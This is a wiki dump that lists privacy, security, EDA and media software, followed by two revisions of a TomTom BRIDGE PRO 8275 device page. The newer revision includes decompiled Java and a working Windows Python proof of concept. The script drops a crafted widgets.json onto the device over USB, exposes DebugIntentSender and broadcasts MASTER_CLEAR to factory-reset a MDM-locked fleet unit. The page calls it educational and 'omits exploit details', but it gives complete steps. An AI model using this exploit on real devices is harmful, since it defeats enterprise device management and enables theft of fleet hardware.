*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.

======Windows 10 IoT LTSC======
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat & setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032.

*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.

======Previous Windows versions======
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.

=====Embedded Devices [Network equipment]=====

*[https://openwrt.org/ OpenWrt] - is an open-source project for embedded operating systems based on Linux, primarily used on embedded devices to route network traffic.

*[https://dd-wrt.com/ DD-WRT] - is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.

*[https://www.pfsense.org/ pfSense] - is a free and open-source operating system for firewalls and routers, primarily based on FreeBSD, that provides a comprehensive network security solution.

*[https://opnsense.org/ OPNsense] - is an open-source firewall and routing platform built on FreeBSD. It's designed to be user-friendly and easy to configure, offering a wide range of features found in commercial firewalls, plus many more.

=====Smartphones [Android "de-google"]=====

*[https://lineageos.org/ LineageOS] - is a free and open-source operating system for Android devices, based on the Android mobile platform.

*[https://grapheneos.org/ GrapheneOS] - is a privacy and security focused mobile OS with Android app compatibility developed as a non-profit open source project.

*[https://sailfishos.org/ Sailfish OS] - is a secure mobile operating system optimized to run on smartphones and tablets, and also easily adaptable to all kinds of embedded devices and use cases.

*[https://calyxos.org/ CalyxOS] - is a privacy-focused, "de-googled" Android-based operating system created by the Calyx Institute. It aims to defend online privacy, security, and accessibility by removing Google services and replacing them with free and open-source alternatives.

*[https://crdroid.net/ crDroid] - is a highly customized, free Android ROM, based on LineageOS, designed for gaming and customization.

*[https://www.ubuntu-touch.io/ Ubuntu Touch] - is a mobile operating system developed by the UBports community, based on the GNU/Linux operating system. It's a mobile version of Ubuntu, designed for touch-screen devices like smartphones and tablets, with a desktop-like experience.

----

====Tools for opening CAD or Boardview files====
'''Description''': Boardview is a type of file containing information about printed circuit boards, their components, used signals, test points and more. These files may have following extensions: .asc, .bdv, .brd, .bv, .cad, .cst, .gr, .f2b, .fz, .tvw and others.

*[https://pldaniels.com/flexbv5/ FlexBV] - Advanced FlexBV boardview software integrates your boardview files with PDF schematics to substantially ease the process of tracking down faults and understanding damaged boards

*[https://openboardview.org/ OpenBoardView] - is a Open Source Linux SDL/ImGui edition software for viewing .brd files, intended as a drop-in replacement for the "Test_Link" software and "Landrex".

*[https://www.cadence.com/ko_KR/home/tools/allegro-downloads-start.html Allegro®/OrCAD® FREE Physical Viewer] - is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro Package Designer, and Allegro PCB SI technology.

*[http://boardviewer.net/ BoardViewer] - is software intended for viewing various boardview file types like .tvw files and much more supported formats.

*CADview - simple old tool for viewing CAD files of PCB's (Windows). [[Media:CAD View.zip]] [https://www.virustotal.com/gui/file/9a64621ff34d8d674ba6580538908f4ea170fee9cc1cb700485bd41e3a3a42df VT link]

For resources to open in your favorite boardview program visit
[[Literature#Datasheets.2C_boardviews.2C_schematics.2C_manuals|Literature -> Datasheets boardviews & schematics]]

----

====Custom PCB Development Software====

=====Definition and Purpose=====
::'''Computer-Aided Design (CAD)''' refers to software that enables users to create, modify, analyze, or optimize designs in various fields such as architecture, mechanical engineering, and manufacturing. CAD is predominantly used for designing physical structures and components. It allows designers to visualize objects in two-dimensional (2D) or three-dimensional (3D) formats, facilitating precise planning and adjustments before production begins.

::In contrast, '''Electronic Design Automation (EDA)''' encompasses a suite of software tools specifically tailored for the design of electronic systems. EDA is crucial in industries like semiconductor manufacturing and printed ::circuit board (PCB) design. It focuses on automating the processes involved in designing electronic circuits at various levels—from high-level architectural descriptions down to detailed layouts.

::'''Integration Between CAD and EDA'''
::While CAD focuses on physical structures, EDA deals with electronic components. However, as products increasingly integrate both mechanical structures and electronic systems—such as IoT devices—the need for collaboration between CAD and EDA has grown. This integration allows designers to embed electronic circuits within mechanical models seamlessly.

=====Electronics Design Automation [[Wikipedia:Electronic_design_automation|(EDA)]] Suite for Developing Custom PCB's=====

*[https://www.kicad.org/ KiCAD] - is a free CAD suite for electronic design automation (EDA). It facilitates the design and simulation of electronic hardware. It features an integrated environment for schematic capture, PCB layout, manufacturing file viewing, ngspice-provided SPICE simulation, and engineering calculation.

*[https://easyeda.com/ EasyEDA] - EasyEDA is a web-based EDA tool suite that enables hardware engineers to design, simulate, share - publicly and privately - and discuss schematics, simulations and printed circuit boards. It can also be used [https://docs.easyeda.com/en/FAQ/Client/index.html offline].

*[https://fritzing.org/ Fritzing] - is an open-source hardware initiative that makes electronics accessible as a creative material for anyone.

*[https://librepcb.org/ LibrePCB] - is a free, cross-platform, easy-to-use electronic design automation suite to draw schematics and design printed circuit boards – for makers, students and professionals, from beginners to experts.

*[http://www.geda-project.org/ gEDA Project] - The gEDA project has produced and continues working on a full GPL'd suite and toolkit of Electronic Design Automation tools. These tools are used for electrical circuit design, schematic capture, simulation, prototyping, and production.

*[http://repo.hu/projects/pcb-rnd/ pcb-rnd] - is a free/open source, flexible, modular Printed Circuit Board editor. For design of professional and hobby boards. Is feature-rich and compatible. Has a long history, fast paced development, and big plansand is part of the coralEDA ecosystem.

=====Computer Aided Design [[Wikipedia:Computer-aided_design|(CAD)]] Mechanical Engineering=====

*[https://www.freecad.org/ FreeCAD] - is an open-source parametric 3D modeler made primarily to design real-life objects of any size. Parametric modeling allows you to easily modify your design by going back into your model history and changing its parameters.

*[https://openscad.org/ OpenSCAD] - is software for creating solid 3D CAD objects. It is free software and available for Linux/UNIX, MS Windows and Mac OS X.

*[https://brlcad.org/ BRL-CAD] - is a powerful open source cross-platform solid modeling system that includes interactive geometry editing, high-performance ray-tracing for rendering and geometric analysis, a system performance analysis benchmark suite, geometry libraries for application developers, and more than 30 years of active development.

*[https://solvespace.com/index.pl SolveSpace] - is a free (GPLv3) parametric 3d CAD tool. Modeling 3d parts, modeling 2d parts, 3d-printed parts, preparing CAM data, mechanism design, plane and solid geometry.

----
====Other software====

=====Display Driver Utilities (Windows)=====

*[https://github.com/lostindark/DriverStoreExplorer Driver Store Explorer (RAPR)] - is a tool used to manage the Windows driver store, a repository of driver packages that Windows uses to install and update hardware drivers. It helps users list, add, install, delete, and export driver packages, especially those from third-party vendors.

*[https://github.com/Wagnard/display-drivers-uninstaller DDU] - is a driver removal utility that can help you completely uninstall AMD/NVIDIA/Intel graphics card drivers and packages from your system, without leaving leftovers behind (including registry keys, folders and files, and driver store).

*[https://www.techpowerup.com/nvcleanstall/ NVCleanstall] - is a free utility from TechPowerUp that allows you to customize your NVIDIA GeForce driver installation. It enables you to remove unnecessary components and install only the drivers you need, potentially optimizing your system performance and minimizing "bloatware".

*[https://github.com/GSDragoon/RadeonSoftwareSlimmer Radeon Software Slimmer] - is a utility to trim down the bloat with Radeon Software for AMD GPUs on Microsoft Windows.

*[https://forums.guru3d.com/threads/nvslimmer-nvidia-driver-slimming-utility.423072/ NVSlimmer] - is a third-party utility created by uKER and available on guru3d.com that allows users to remove unwanted components from NVIDIA graphics driver installations, effectively "trimming" down the install base. It's not an official Nvidia utility.

=====Host Based Firewall [Windows FOSS]=====
*[https://github.com/tnodir/fort Fort Firewall] - is a very practical firewall that allows you to manage your privacy and security in Windows simply and flexibly. This open-source tool is a perfect alternative to the standard Windows firewall, giving you a lot of customizable features so you can work with your files and programs more comfortably.

=====Web Browsing=====
*[https://www.mozilla.org/firefox/ Mozilla Firefox] - is a free, open source web browser developed by the Mozilla Foundation and Mozilla Corporation in 2004. The Firefox web browser can be used with Windows, Mac and Linux operating systems, as well as Android and iOS mobile devices.

::Extensions & Configurations
:::*[https://github.com/hackademix/noscript NoScript] - The popular NoScript Security Suite browser extension.
:::*[https://github.com/ChrisAntaki/disable-webrtc-firefox WebRTC block] - WebRTC leaks your actual IP addresses from behind your VPN, by default. With this extension you can disable it.
:::*[https://github.com/arkenfox/user.js/ user.js] - Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening.
:::*[https://github.com/yokoffing/Betterfox Betterfox] - Firefox speed, privacy, and security: a user.js template for configuration. Your favorite browser, but better.
:::*[https://github.com/gorhill/uBlock uBlock] - Help users neutralize privacy-invading ads CPU and memory-efficient.
:::*[https://github.com/sereneblue/chameleon Chameleon] - is a WebExtension port of the popular Random Agent Spoofer. Spoofs a lot of client fingering techniques and adds security.
:::*[https://github.com/EFForg/privacybadger Privacy Badger] - is a browser extension that automatically learns to block invisible trackers. PB is made by the leading digital rights nonprofit EFF to stop companies from spying on you.

*[https://www.torproject.org/ Tor Browser] - [[Wikipedia:Tor_(network)|Tor]] (The Onion Router) is a network that anonymizes web traffic to provide truly private web browsing. The Tor Browser hides your IP address and browsing activity by redirecting web traffic through a series of different routers known as nodes.

*[https://guardianproject.info/apps/org.torproject.android/ Orbot for Android] - is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities.

======Public Networks======

*[https://www.torproject.org/ [[Wikipedia:Tor_(netwerk)|Tor]]] - is an open-source privacy network that enables anonymous web browsing. The worldwide Tor computer network uses secure, encrypted protocols to ensure that users' online privacy is protected.

*[https://geti2p.net/ The Invisible Internet Project [[Wikipedia:I2P|(I2P)]]] - is a fully encrypted private network layer. It protects your activity and location. Every day people use the network to connect with people without worry of being tracked or their data being collected.

*[https://www.freenet.de/ FreeNet] - is a peer-to-peer platform for censorship-resistant, anonymous communication. It uses a decentralized distributed data store to keep and deliver information, and has a suite of free software for publishing and communicating on the Web without fear of censorship.

*[https://zeronet.io/ ZeroNet] - Open, free and uncensorable websites, using Bitcoin cryptography and BitTorrent network · We believe in open, free, and uncensored network.

*[https://lokinet.org/ Lokinet] - is an onion-router that lets you access the internet anonymously. Built on LLARP, the fastest onion-routing protocol in the world.

*[https://nymtech.net/ Nym] - protect internet traffic by routing it through a decentralised mixnet that can be accessed anonymously using zk-nyms.

=====Email Clients / Email Encryption Standards=====
*[https://www.thunderbird.net/ Mozilla ThunderBird] - is a free, open-source, cross-platform application for managing email, news feeds, chat, and news groups. It is a local email application, meaning it installs and runs as a client on your device, being rather than browser or web-based. [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq FAQ How to implement OpenPGP in Thunderbird].

*[https://www.openpgp.org/ OpenPGP] - is the most widely used email encryption standard. It is defined by the OpenPGP Working Group of the Internet Engineering Task Force (IETF) as a Proposed Standard in RFC 4880. OpenPGP was originally derived from the PGP software, created by Phil Zimmermann.

*[https://www.gnupg.org/ GnuPG] - is a complete and free implementation of the OpenPGP standard as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications.

*[https://wiki.gnome.org/Apps/Evolution Evolution] - is a personal information management application that provides integrated mail, calendaring and address book functionality. Check the Privacy Policy sub-page for a general information about user data usage. [https://riseup.net/en/email/clients/evolution FAQ How to implement OpenPGP in Evolution].

*[https://neomutt.org/ NeoMutt] - is a command line mail reader (or MUA ). It's a fork of Mutt with added features.

=====Chat Applications / Platforms=====
*[https://www.teamspeak.com/ TeamSpeak] - is a VoIP application for audio communication between users via a chat channel, similar to a video meeting. Cross-platform with military-grade security, lag-free performance, privacy and complete control.
*[https://github.com/RetroShare/RetroShare RetroShare] - is a Free and Open Source cross-platform, Friend-2-Friend and secure decentralised communication platform.
*[https://github.com/JFreegman/toxic Toxic] - is a Tox-based P2P messenger that provides end-to-end encrypted communications without the use of centralized servers. It supports text messaging, file sharing, 1-on-1 voice and video calls, private audio conferences, public and private text group chats.
*[https://www.jabber.org/ Jabber] - is a original messaging service based on [https://xmpp.org/ XMPP] and has been continuously offered for free since 1999.
::XMPP clients & extensions
:::*[https://xmpp.org/software/ XMPP client list] - is a list of XMPP clients composed by XMPP itself.
:::*[https://otr.cypherpunks.ca/ Off-the-Record Messaging (OTR) for XMPP] - is a cryptographic protocol that provides encryption for instant messaging conversations. OTR uses a combination of AES symmetric-key algorithm with 128 bits key length, the Diffie–Hellman key exchange with 1536 bits group size, and the SHA-1 hash function.
:::*[https://omemo.im/ OMEMO.IM] is a free, secure XMPP-based chat client available for Android and Windows that utilizes the OMEMO (Multi-End Message and Object) end-to-end encryption protocol.
:::*[https://xmpp.org/extensions/xep-0384.html XEP-0384: OMEMO Encryption] defines an end-to-end encryption protocol for XMPP messaging that uses double-ratchet and key-exchange techniques to securely encrypt one-to-one and group chats across multiple devices.
*[https://getsession.org/ Session] - Session is an end-to-end encrypted messenger that minimises sensitive metadata, designed and built for people who want absolute privacy and freedom from any form of surveillance.
*[https://github.com/briar Briar] - is a messaging app designed for activists, journalists, and anyone else who needs a safe, easy and robust way to communicate. Unlike traditional messaging apps, Briar doesn't rely on a central server - messages are synchronized directly between the users' devices.
*[https://matrix.org/ Matrix] - is an open network for secure, decentralised communication.
*[https://discord.com/ Discord] - is a voice, video and text communication service used by over a hundred million people to hang out and talk with their friends and communities.
::Discord client advice
:::*1. Stop using the installed electron PC based version. Use the web version.
:::*2. Android stock client is spoiled with rubbish code slowing down your SoC and sending loads of analytics, use [https://github.com/Aliucord/Aliucord Aliucord] instead (but carefully read the readme.md, ToS issue).

=====File Archiver Utilities=====

*[https://www.7-zip.org/ 7-Zip] - is a free and open source file archiver.

*[https://github.com/M2Team/NanaZip NanaZip] - is a free and open source file archiver intended for the modern Windows experience.

*[https://peazip.github.io/ PeaZip] - is a free and open source file archiver, similar to WinRar, WinZip, and 7-Zip.

=====Disk Encryption Software=====

*[https://guardianproject.info/archive/luks/ Linux Unified Key Setup (LUKS)] - The Linux Unified Key Setup (LUKS) is a disk encryption specification created by Clemens Fruhwirth in 2004 and originally intended for Linux. LUKS implements a platform-independent standard on-disk format for use in various tools

*[https://www.veracrypt.fr/code/VeraCrypt/ VaraCrypt] - VeraCrypt is free open-source disk encryption software for Windows, Mac OS X and Linux. Support for on-the-fly encryption [[Wikipedia:Disk_encryption|(OTFE)]].

=====Image Manipulation Tools=====

*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.

*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.

=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====

*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.

*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.

*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.

*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.

*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.

*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.

*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.

=====Video Recording and Live Streaming=====

*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.

*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.

====Search engine (self-hosted & open-source)====
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches.

*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy.

*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.

*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.

====Social Network / Fediverse (self-hosted & open-source)====

*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].

*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.

*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.

*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.

==Education==

:[[:Literature|See the literature wiki page for all the resources.]]

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-04T01:39:01Z

Polymorphic7: typo

[[File:Tomtom0.png|right|300px]]
[[File:Tomtom1.png|right|300px]]

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
** Data transfer (MTP/PTP)
** Android Debug Bridge (ADB) access (if enabled)
** USB On-The-Go (OTG) for supported peripherals

==== microSD card slot ====
* Supports microSD / microSDHC cards
* Used for:
** Storage expansion (maps, applications, media)
** Offline data transfer and updates

== Software and platform ==
The TomTom BRIDGE platform is based on the Android Open Source Project (AOSP), enabling:
* Installation of custom APK applications
* Integration with enterprise backends
* Remote configuration and control via MDM systems
* Access to standard Android APIs alongside TomTom navigation APIs

TomTom maintains control over firmware and system updates to ensure regulatory compliance and device integrity.

== Lifecycle ==
Devices in the 4FI70 series have reached end-of-life status but may still receive limited support and updates.

----

== Device Administrator / MDM policy privilege escalation ==
This section is for educational and defensive security research purposes only.

=== Overview ===
The TomTom BRIDGE platform supports enterprise Mobile Device Management (MDM) and Android Device Administrator APIs. These features allow organizations to:
* Enforce security policies
* Control application installation
* Restrict user actions
* Remotely manage the device

Because the device runs 4.3 (kernel patched Jun 14 2017), it relies on legacy Device Administrator mechanisms rather than modern Android Enterprise (Device Owner) APIs.

==== createPackageContext misuse (research finding) ====
During analysis of the TomTom BRIDGE platform, a potential issue was identified related to the use of the Android API method <code>createPackageContext()</code>.

===== Background =====
The <code>createPackageContext()</code> method allows an application to create a context for another installed package. When used with specific flags (e.g., <code>CONTEXT_INCLUDE_CODE</code> or <code>CONTEXT_IGNORE_SECURITY</code>), it can enable access to that application's resources or code, depending on system permissions and signature alignment.

This mechanism is typically restricted to:
* System applications
* Applications signed with the same certificate
* Privileged contexts with elevated permissions

===== Observed behavior =====
Testing on the PRO 8275 (Android 4.3 with kernel patched up to 14 Jun 2017 and build 17.223.2780796.4807.122 OS italia-rel-17.2.21095) indicated that:
* Certain preinstalled or privileged applications expose functionality that can be accessed via <code>createPackageContext()</code>
* In some cases, access controls appeared weaker than expected for a hardened enterprise deployment
* The behavior may allow interaction with components or resources outside the normal application sandbox

===== Proof of concept (high-level demonstration) =====
This demonstration is intentionally limited and omits exploit details. It is intended to validate behavior in a controlled research environment only.

Weakness in the system is the widget.json fechter from Internal storage.
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledWidgets
</syntaxhighlight>
</blockquote>
and
<blockquote style="font-size: 90%; max-width: 600px;">
<syntaxhighlight lang="java">
com.tomtom.navpad.widgetorganizerlib.WidgetInfoFetcher.fetchInstalledApplications
</syntaxhighlight>
</blockquote>

Vulnerable function in the WidgetInfoFetcher class in question.
<syntaxhighlight lang="java" highlight="36">
private void fetchInstalledApplications(Context context, boolean showTestapps) {
Drawable iconDrawable;
if (!$assertionsDisabled && context == null) {
throw new AssertionError();
}
if (mAppShortcutsInfoCachedList != null) {
this.mWidgetInfoList.addAll(mAppShortcutsInfoCachedList);
generateWidgetInfoMap();
return;
}
Resources resources = context.getResources();
ArrayList<CachedActivityInfo> apps = createAppList(context, showTestapps);
int widgetIndex = 0;
for (CachedActivityInfo app : apps) {
ActivityInfo activityInfo = app.getActivityInfo();
String appPackageName = activityInfo.packageName;
String appClassName = activityInfo.name;
if (!NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadAppDrawerActivity".equals(appClassName)) {
if (this.mIsConfigurable || !NAVAPP_PACKAGE_NAME.equals(appPackageName) || !"com.tomtom.navpad.navapp.NavPadWidgetDrawerActivity".equals(appClassName)) {
int pageIndex = widgetIndex / 8;
int widgetIndexOnPage = widgetIndex % 8;
WidgetInfo wInfo = new WidgetInfo();
wInfo.setWidgetType(WidgetInfo.WidgetType.APPSHORTCUT);
wInfo.setIsFromDrawer(true);
wInfo.setId(widgetIndex + 1);
wInfo.setPackageName(appPackageName);
wInfo.setClassName(appClassName);
wInfo.setPageNumber(pageIndex + 1);
wInfo.setEnabled(true);
wInfo.setLayoutColumn(widgetIndexOnPage % 4);
wInfo.setLayoutRow(widgetIndexOnPage / 4);
wInfo.setBackgroundColor(resources.getColor(R.color.navpad_homescreen_background_color));
wInfo.setTextColor(resources.getColor(R.color.navpad_homescreen_appshortcut_text_color));
wInfo.setName(app.getLabel());
try {
Context otherAppCtx = context.createPackageContext(appPackageName, 2);
iconDrawable = otherAppCtx.getResources().getDrawableForDensity(activityInfo.getIconResource(), 320);
} catch (PackageManager.NameNotFoundException e) {
if (Log.W) {
Log.w(TAG, "Could not find package " + appPackageName + " to fetch larger icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
} catch (Resources.NotFoundException e2) {
if (Log.W) {
Log.w(TAG, "Could not fetch xhdpi icon from package " + appPackageName + " reverting to default icon.");
}
iconDrawable = activityInfo.loadIcon(context.getPackageManager());
}
wInfo.setIconDrawable(iconDrawable);
this.mWidgetInfoList.add(wInfo);
widgetIndex++;
}
}
}
generateWidgetInfoMap();
mAppShortcutsInfoCachedList = this.mWidgetInfoList;
}
</syntaxhighlight>

Start the tablet in MDM mode or admin locked restricted mode. Start the '''PoC python script''' when the tablet is connected to the computer by MicroUSB wire and when a error occurs on the screen the code executed succesfully. Now press ok and swipe to left on the home screen and now you see '''Debug Intent Sender''', open it and fill in the action textbox '''"android.intent.action.MASTER_CLEAR"''' now press send broadcast and your locked device is '''factory reset'''.

PoC script (Windows only, pymtp on Linux is a incomplete fork and does not work).
<syntaxhighlight lang="python">
import os
import json
import time
import win32com.client

OUTPUT_FILE = "widgets.json"

JSON_DATA = {
"application": [
{
"package_name": "com.android.settings",
"class_name": "com.android.settings.DebugIntentSender",
"startcell": "2.11",
"endcell": "2.11"
}
]
}

with open(OUTPUT_FILE, "w") as f:
json.dump(JSON_DATA, f, indent=4)

shell = win32com.client.Dispatch("Shell.Application")
my_computer = shell.NameSpace(17)

tomtom_device = None
for item in my_computer.Items():
if "tomtom" in item.Name.lower():
tomtom_device = item
break

if not tomtom_device:
print("TomTom device not found.")
exit(1)

device_root = tomtom_device.GetFolder

device_root.CopyHere(os.path.abspath(OUTPUT_FILE))
time.sleep(2)

print(f"{OUTPUT_FILE} successfully injected DebugIntentSender.")
</syntaxhighlight>

<gallery widths="200px" heights="120px" perrow="3">
File:Error after injection.jpg|Error after injection
File:Debugintentsender.jpg|DebugIntentSender class on the homescreen
File:Broadcast.jpg|Broadcast MASTER_CLEAR intent
</gallery>

===== Unlocking Factory Tools =====
Go to About your TomTom device. Now tap Model number 5 times.
<gallery widths="200px" heights="120px" perrow="1">
File:Factory tools.jpg|Factory Tools
</gallery>

===== Research paper =====
[[:File:Android createPackageContext Paper 10 5 0.pdf|Android createPackageContext Paper 10 5 0.pdf]]
[https://www.ndss-symposium.org/wp-content/uploads/2017/09/10_5_0.pdf Download PDF remote]

===== Disclosure status =====
This finding is based on internal testing and has not been publicly assigned a CVE at the time of writing.

TomTom BRIDGE 7" Truck/Pro 8275 (4FI70)

2026-04-04T01:37:15Z

Polymorphic7: add inf

[[File:Tomtom0.png|right|300px]]
[[File:Tomtom1.png|right|300px]]

== Overview ==
The '''TomTom BRIDGE 7" Truck / PRO 8275 (model 4FI70)''' is a ruggedized, enterprise-grade GPS navigation and telematics device designed for commercial fleet and truck operations. It combines dedicated truck navigation with an open Android-based platform, allowing integration with business applications and fleet management systems such as WEBFLEET.

The device is part of the TomTom BRIDGE ecosystem, which provides customizable in-vehicle hardware for logistics, telematics, and workflow automation.

== Contents ==
__TOC__

== Product family ==
* TomTom BRIDGE platform (Android-based in-vehicle terminal)
* TomTom PRO 8275 Truck (7" driver terminal variant)
* Model identifiers:
** 4FI70 (with cellular/GPRS module)
** 4FI72 / 4FI73 (non-cellular variants)

== Key features ==
* 7-inch rugged touchscreen display
* Truck-specific navigation (routes optimized for size, weight, and restrictions)
* Open Android platform (AOSP-based)
* Support for custom enterprise applications
* Integration with fleet management systems (e.g., WEBFLEET)
* Built-in mobile device management (MDM) capabilities
* Lifetime maps and navigation services (subject to lifecycle support)
* Rear camera and vehicle integration support

== Hardware specifications ==
=== System ===
* Operating system: Android 4.3 (14 Jun 2017 kernel patches)
* Build number: '''17.223.2780796.4807.122 OS italia-rel-17.2.21095'''
* CPU: Qualcomm Snapdragon 400 (quad-core, 1.2 GHz)
* RAM: 1.5 GB
* Storage: 16 GB / 32 GB (expandable via SD card)

=== Display ===
* Resolution: 1280×720 (720p)
* Multi-touch capacitive screen

=== Connectivity ===
* Wi-Fi (2.4 GHz / 5 GHz)
* Bluetooth 4.0
* Cellular (model-dependent, e.g., 4FI70 includes GSM/LTE)
* USB (OTG support)
* CAN bus interface for vehicle integration

=== Sensors ===
* GPS / GLONASS GNSS receiver
* Accelerometer
* Gyroscope

=== Power ===
* 8–32V input by docking (compatible with 12V/24V vehicle systems)
* MicroUSB charging 5v

=== Device I/O ===
==== Docking connector ====
* Proprietary multi-pin docking interface
* Used for:
** Power delivery (via vehicle dock)
** CAN bus integration
** External peripherals (e.g., cameras, telematics modules)
* Enables fixed in-vehicle installation with secure mounting

==== USB ====
* Micro-USB port (front-facing)
* Supports:
** Device charging
